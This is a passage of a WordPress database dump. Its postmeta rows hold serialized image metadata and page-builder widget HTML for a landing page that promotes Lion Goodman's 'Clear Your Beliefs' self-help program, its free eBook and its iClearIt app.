ight";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1067, 1564, '_edit_lock', '1413855952:2'),
(1069, 1566, '_wp_attached_file', '2014/10/headb.jpg'),
(1070, 1566, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1024;s:6:"height";i:249;s:4:"file";s:17:"2014/10/headb.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"headb-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:16:"headb-300x72.jpg";s:5:"width";i:300;s:6:"height";i:72;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"headb-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:17:"headb-400x249.jpg";s:5:"width";i:400;s:6:"height";i:249;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:17:"headb-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:17:"headb-672x249.jpg";s:5:"width";i:672;s:6:"height";i:249;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1071, 1566, '_edit_lock', '1413857108:2'),
(1072, 1567, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1076, 1569, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:401:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1074, 1568, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:578:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe> <p><a href="http://vimeo.com/109282066">Lion Goodman ICLEAR IT APP 2.mp4</a> from <a href="http://vimeo.com/user33370576">Lion</a> on <a href="https://vimeo.com">Vimeo</a>.</p></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 